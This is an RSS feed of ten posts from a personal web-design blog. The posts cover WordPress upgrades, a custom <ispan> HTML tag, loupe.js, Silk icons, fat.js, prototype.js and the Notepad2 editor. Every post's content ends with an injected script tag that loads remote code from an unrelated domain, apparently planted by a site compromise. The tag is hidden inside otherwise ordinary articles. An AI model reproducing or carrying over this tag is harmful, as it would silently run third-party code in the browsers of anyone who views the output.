<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>nerdcereal.com &#187; Development</title>
	<atom:link href="http://nerdcereal.com/category/development/feed/" rel="self" type="application/rss+xml" />
	<link>http://nerdcereal.com</link>
	<description>A blog about art and the internet and their intersection at web design.</description>
	<lastBuildDate>Mon, 15 Mar 2010 06:23:53 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Site Updates</title>
		<link>http://nerdcereal.com/site-updates/</link>
		<comments>http://nerdcereal.com/site-updates/#comments</comments>
		<pubDate>Mon, 21 Sep 2009 08:05:12 +0000</pubDate>
		<dc:creator>banana</dc:creator>
				<category><![CDATA[Development]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/?p=280</guid>
		<description><![CDATA[I don&#8217;t think I&#8217;ve upgraded the version of Wordpress that Nerdcereal.com has been using since I first started using it. It was running version 2.1.2 and now the software&#8217;s up to version 2.8.4. My other blogs were using the up-to-date software so it was interesting to use two different versions of Wordpress at the same [...]]]></description>
			<content:encoded><![CDATA[<p>I don&#8217;t think I&#8217;ve upgraded the version of <a href="http://wordpress.org">Wordpress</a> that Nerdcereal.com has been using since <a href="http://nerdcereal.com/my-first-wordpress-post/">I first started using it</a>. It was running version 2.1.2 and now the software&#8217;s up to version 2.8.4. My other blogs were using the up-to-date software so it was interesting to use two different versions of Wordpress at the same time. But installations will not be a problem from here on out because ofthe 1-click install; I love that feature.</p>
<p>I also finally removed my <a href="http://adbrite.com">AdBrite</a> skysraper from the right-hand side of the site. I wasn&#8217;t making any money and I got tired of looking at all the weight-loss ads. Instead I&#8217;ve replaced the ads with imagry from <a href="http://artists.gawker.com">Gawker Artists</a>. (The link ads underneath the skyscraper are still AdBrite.)<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/site-updates/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Introducing the &lt;ispan&gt;</title>
		<link>http://nerdcereal.com/introducing-the-ispan/</link>
		<comments>http://nerdcereal.com/introducing-the-ispan/#comments</comments>
		<pubDate>Wed, 02 Jan 2008 06:15:37 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/introducing-the-ispan/</guid>
		<description><![CDATA[I&#8217;ve invented a new HTML tag called the &#60;ispan&#62;. It behaves exactly like a &#60;span&#62;, it just won&#8217;t inherit any CSS that&#8217;s applied to a span.
At my job, our interactive advertising formats dynamically manipulate our publishers&#8217; pages and add content. The trouble with this is that we have no idea the CSS that the publisher [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve invented a new HTML tag called the <code>&lt;ispan&gt;</code>. It behaves exactly like a <code>&lt;span&gt;</code>, it just won&#8217;t inherit any CSS that&#8217;s applied to a span.</p>
<p>At my job, our interactive advertising formats dynamically manipulate our publishers&#8217; pages and add content. The trouble with this is that we have no idea the CSS that the publisher uses and our content can erroneously inherit some of the publishers&#8217; styles. Moreover we can&#8217;t edit their CSS. The worse CSS rule I&#8217;ve come across is this: <code>img {height:50px; width:50px;}</code></p>
<p>There&#8217;s two strategies to avoid this. 1) On every single tag you add to the document, you must set an inline style to override any possible inheritance. (There are at least 10+ common styles to account for.) 2) Make every element (except for images and iframes) an ispan element and odds are the publisher has no styles set for an ispan.</p>
<p>There are two catches: 1) You must create the &lt;ispan&gt; with the createElement method (you cannot use innerHTML or document.write). 2) I thought this was invincible to any CSS a crappy coder could create, but it&#8217;s still suceptible to any styles applied to the selector &#8216;*&#8217;.</p>
<p>So, if you&#8217;re dealing with javascript and unknown CSS, simply create your own tag. You can call it whatever you want: &lt;whateveryouwant&gt;<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/introducing-the-ispan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Homer&#8217;s Brain (brought to you by loupe.js)</title>
		<link>http://nerdcereal.com/homers-brain-brought-to-you-by-loupejs/</link>
		<comments>http://nerdcereal.com/homers-brain-brought-to-you-by-loupejs/#comments</comments>
		<pubDate>Thu, 03 May 2007 01:37:27 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Arts]]></category>
		<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/homers-brain-brought-to-you-by-loupejs/</guid>
		<description><![CDATA[ This neato magnifying glass widget (loupe.js) lets webmasters add some interactivity to an otherwise static image. Pictured here is a profile of Homer Simpson. Peering through the magnifying glass into his brain, Dr. Hibburt (or you) can see the  thickness of Homer&#8217;s skull and the scarcity of his gray matter.
Loupe.js also lets you [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.netzgesta.de/loupe/homer.html"><img src="http://nerdcereal.com/blog/wp-content/uploads/2007/05/homer.gif" class="alignleft" alt="Homer’s Brain" /></a> This neato <a href="http://www.netzgesta.de/loupe/homer.html">magnifying glass widget</a> (<a href="http://www.netzgesta.de/loupe/" title="loupe.js">loupe.js</a>) lets webmasters add some interactivity to an otherwise static image. Pictured here is a profile of Homer Simpson. Peering through the magnifying glass into his brain, Dr. Hibburt (or you) can see the  thickness of Homer&#8217;s skull and the scarcity of his gray matter.</p>
<p>Loupe.js also lets you use the magnifying glass to <a href="http://www.netzgesta.de/loupe/caribbean.html">zoom</a>.</p>
<p>Note: only works in Firefox.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/homers-brain-brought-to-you-by-loupejs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Web Developer Toolbar Now Uses Silk Icons</title>
		<link>http://nerdcereal.com/web-developer-toolbar-now-uses-silk-icons/</link>
		<comments>http://nerdcereal.com/web-developer-toolbar-now-uses-silk-icons/#comments</comments>
		<pubDate>Fri, 02 Feb 2007 04:23:38 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/web-developer-toolbar-now-uses-silk-icons/</guid>
		<description><![CDATA[A couple of weeks ago, I wrote about the open source icon library, silk icons, hypothesizing that one day they would be the standard for many web applications.
I&#8217;ve seen them used on other sites since then, sometimes as favicons, but the most prominent place I&#8217;ve seen them to-date is on version 1.1.3 of the Web [...]]]></description>
			<content:encoded><![CDATA[<p>A couple of weeks ago, I <a href="http://nerdcereal.com/blog/?p=76">wrote about</a> the open source icon library, <a title="Silk Icons" href="http://www.famfamfam.com/lab/icons/silk/">silk icons</a>, hypothesizing that one day they would be the standard for many web applications.</p>
<p>I&#8217;ve seen them used on other sites since then, sometimes as favicons, but the most prominent place I&#8217;ve seen them to-date is on <a title="Web Developer's Toolbar" href="https://addons.mozilla.org/firefox/60/">version 1.1.3 of the Web Developer&#8217;s Toolbar</a>.</p>
<div style="text-align: center"><img alt="silk icons in the web developer's toolbar" id="image145" src="http://nerdcereal.com/blog/wp-content/uploads/2007/02/silk-developer.gif" /></div>
<p>Version 1.1.3 comes with other much-welcomed improvements. One of which includes showing the DOM tree in a selectable text input rather than in the status bar, making it easy to copy for reference.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/web-developer-toolbar-now-uses-silk-icons/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Silk Icons (they&#8217;re free)</title>
		<link>http://nerdcereal.com/silk-icons-theyre-free/</link>
		<comments>http://nerdcereal.com/silk-icons-theyre-free/#comments</comments>
		<pubDate>Thu, 28 Dec 2006 05:12:19 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Icons]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/silk-icons-theyre-free/</guid>
		<description><![CDATA[This is an open source set of free icons, licensed under the creative commons attribution 2.5. They&#8217;re downright sexy, if you&#8217;re into that sort of thing. (Did I just call icons sexy?) Don&#8217;t waste your time trying to make your own, because it will take too long and won&#8217;t look as good as these puppies.

Silk [...]]]></description>
			<content:encoded><![CDATA[<p>This is an open source set of free icons, licensed under the creative commons attribution 2.5. They&#8217;re downright sexy, if you&#8217;re into that sort of thing. (Did I just call icons sexy?) Don&#8217;t waste your time trying to make your own, because it will take too long and won&#8217;t look as good as these puppies.</p>
<p><img src="http://nerdcereal.com/blog/wp-content/uploads/2006/12/silk_icons.gif" class="centered" alt="free icons, silk icons" id="image75" /></p>
<p><a href="http://www.famfamfam.com/lab/icons/silk/" title="silk icons">Silk icons</a> are perfect for any web app and make your site look professional and more usable. I haven&#8217;t seen them anywhere else but would wager that they will become a staple on most open source web applications.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/silk-icons-theyre-free/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>spiral loading gifs, loading.gif</title>
		<link>http://nerdcereal.com/spiral-loading-gifs-loadinggif/</link>
		<comments>http://nerdcereal.com/spiral-loading-gifs-loadinggif/#comments</comments>
		<pubDate>Wed, 20 Dec 2006 21:52:22 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/spiral-loading-gifs-loadinggif/</guid>
		<description><![CDATA[I came across www.ajaxload.info while searching for a spiral loading gif online. It lets you create a custom color gif to use while your page is working. It has all sorts of loading bars, similar to the Firefox and Internet Explorer page loading images. Unfortunately, I was looking for a larger one; perhaps there&#8217;ll be [...]]]></description>
			<content:encoded><![CDATA[<p><img id="image72" alt="loading.gif" class="alignleft" src="http://nerdcereal.com/blog/wp-content/uploads/2006/12/ajax-loader.gif" />I came across <a title="Loading Gifs" href="http://www.ajaxload.info">www.ajaxload.info</a> while searching for a spiral loading gif online. It lets you create a custom color gif to use while your page is working. It has all sorts of loading bars, similar to the Firefox and Internet Explorer page loading images. Unfortunately, I was looking for a larger one; perhaps there&#8217;ll be one in the future.</p>
<p>On a side note, check out Google&#8217;s horrible job at contextually serving its AdSense ad. It&#8217;s for: Loading Dock Levelers / Full line of loading dock leveler with load capacities of 160,000 lbs. Yeah&#8230; that&#8217;s a product that all web developers want.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/spiral-loading-gifs-loadinggif/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>fat.js Fade Anything</title>
		<link>http://nerdcereal.com/fatjs-fade-anything/</link>
		<comments>http://nerdcereal.com/fatjs-fade-anything/#comments</comments>
		<pubDate>Thu, 05 Oct 2006 07:07:49 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/fatjs-fade-anything/</guid>
		<description><![CDATA[I just implemented this at work. It&#8217;s a really cool javascript class that&#8217;s used in the Wordpress admin panel (the fade feedback you get after editing a file&#8217;s code via admin).
It works by adding class="fade-#FFFF66" to any element on the page. Documentation can be found at http://www.axentric.com/aside/fat/. I&#8217;m surprised I didn&#8217;t know this before, but [...]]]></description>
			<content:encoded><![CDATA[<p>I just implemented this at work. It&#8217;s a really cool javascript class that&#8217;s used in the Wordpress admin panel (the fade feedback you get after editing a file&#8217;s code via admin).</p>
<p>It works by adding <code>class="fade-#FFFF66"</code> to any element on the page. Documentation can be found at <a title="Fade Anything fat.js" href="http://www.axentric.com/aside/fat/">http://www.axentric.com/aside/fat/</a>. I&#8217;m surprised I didn&#8217;t know this before, but I also learned you can apply two classes to any one element by simply putting a space in between each class, like <code>class="class1 class3"</code>.</p>
<p>I actually implemented it a little differently because I wanted the fade to be triggered by an event other than load. I called the fade_element method of the Fat class, like so: <code>Fat.fade_element(id, fps, duration, from, to);</code></p>
<p>It should be self-explanatory, but <code>id</code> is the element&#8217;s id, <code>fps</code> is frames per second, <code>duration</code> is the time (in milliseconds), <code>from</code> is the beginning color and <code>to</code> is the final color of the element. Only the id is mandatory. Defaults for the rest of the arguments include 30 fps, 3 seconds (3000 milliseconds), from yellow (#FFFF33), and to the id&#8217;s orginal background color.</p>
<p>From a design standpoint, the fade is unique because it offers a compromise between and alert box and a printed message. Initially, there is a significant color change, on the page, but it slowly fades after your attention has been grabbed and is no longer needed. It&#8217;s quite similar to desktop email updates from Outlook and Gmail.</p>
<p>But really, this file is called Fade Anything because you can really fade anything on the page. It doesn&#8217;t just have to be used for alerts and messages. Use it to make an animated sunset on your page. Be creative.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/fatjs-fade-anything/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>prototype.js</title>
		<link>http://nerdcereal.com/prototypejs/</link>
		<comments>http://nerdcereal.com/prototypejs/#comments</comments>
		<pubDate>Tue, 03 Oct 2006 03:46:52 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Javascript]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/prototypejs/</guid>
		<description><![CDATA[I used prototype.js once before to do some AJAX, but it was so easy and I was in a hurry so I didn&#8217;t know exactly what it was doing. I was also unaware of everything else that it was capable.
This weekend I spent some time boning up on everything that prototype.js offers. It&#8217;s not exactly [...]]]></description>
			<content:encoded><![CDATA[<p>I used prototype.js once before to do some AJAX, but it was so easy and I was in a hurry so I didn&#8217;t know exactly what it was doing. I was also unaware of everything else that it was capable.</p>
<p>This weekend I spent some time boning up on everything that prototype.js offers. It&#8217;s not exactly a standard (but most likely will be) so there&#8217;s not much documentation. The best documentation I could find was <a title="Prototype.js Documentation" href="http://www.sergiopereira.com/articles/prototype.js.html">here</a>.</p>
<p>It&#8217;s probably best known for its AJAX extensions due to its inclusion in <a title="24 Ways to Impress Your Friends" href="http://24ways.org">24ways.org</a> but it also offers other much welcome shortcuts for javascript coders.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/prototypejs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>I Found My Text Editor</title>
		<link>http://nerdcereal.com/i-found-my-text-editor/</link>
		<comments>http://nerdcereal.com/i-found-my-text-editor/#comments</comments>
		<pubDate>Tue, 04 Apr 2006 00:23:04 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/?p=11</guid>
		<description><![CDATA[I finally found a text editor that I can call mine. For code monkeys, a text editor is the most commonly used program. Previously, I&#8217;d been using Notepad and Dreamweaver where necessary. These, of course, are on opposite ends of the spectrum. Dreamweaver is a behemoth with sophisticated, but often times unnecessary, tools. Conversely, Notepad [...]]]></description>
			<content:encoded><![CDATA[<p>I finally found a text editor that I can call mine. For code monkeys, a text editor is the most commonly used program. Previously, I&#8217;d been using Notepad and Dreamweaver where necessary. These, of course, are on opposite ends of the spectrum. Dreamweaver is a behemoth with sophisticated, but often times unnecessary, tools. Conversely, Notepad offers Zen-like simplicity of pure code for the monkey&#8217;s enjoyment.</p>
<p>But Notepad was a little too simple for my tastes, for example, it doesn&#8217;t offer syntax highlighting. I tried Crimson Editor, TextPad, and MetaPad, none of which were satisfying. Perhaps I was being too nostalgic and didn&#8217;t want to leave the familiar look &#038; feel of my long-standing favorite text editor, but I continued to use Notepad.</p>
<p>The final straw was its lack of support for line feeds, generated by other editors, which lumps the whole document into one paragraph. I searched to find a way around this problem, like a find &#038; replace, and stumbled upon <a href="http://www.cre8asiteforums.com/forums/lofiversion/index.php/t32349.html">this informative blog about how different systems treat lines</a>. I didn&#8217;t find the solution that I was looking for, but I found a text editor I could love like Notepad, so appropriately named <a href="http://www.flos-freeware.ch/notepad2.html">Notepad2</a>. I love you Notepad2.<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/i-found-my-text-editor/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blog Layout Updated</title>
		<link>http://nerdcereal.com/blog-layout-updated/</link>
		<comments>http://nerdcereal.com/blog-layout-updated/#comments</comments>
		<pubDate>Mon, 20 Mar 2006 06:18:01 +0000</pubDate>
		<dc:creator>Sean</dc:creator>
				<category><![CDATA[Development]]></category>

		<guid isPermaLink="false">http://nerdcereal.com/blog/?p=8</guid>
		<description><![CDATA[I&#8217;ve finished the first iteration of my blog layout for now. It&#8217;s based on the design of my original site, only the it&#8217;s built completely differently; this is a CSS layout vs. a table-based layout used in my original site.
I&#8217;m still getting a feel for the ins and outs of this blog&#8217;s structure and classes. [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve finished the first iteration of my blog layout for now. It&#8217;s based on the design of my original site, only the it&#8217;s built completely differently; this is a CSS layout vs. a table-based layout used in my original site.</p>
<p>I&#8217;m still getting a feel for the ins and outs of this blog&#8217;s structure and classes. Next item on the list will be extending the yellow sidebar to the bottom of the screen, taking care of the footer, and making the single post view the same as the multiple post view (not getting-rid of the side bar).<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://nerdcereal.com/blog-layout-updated/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
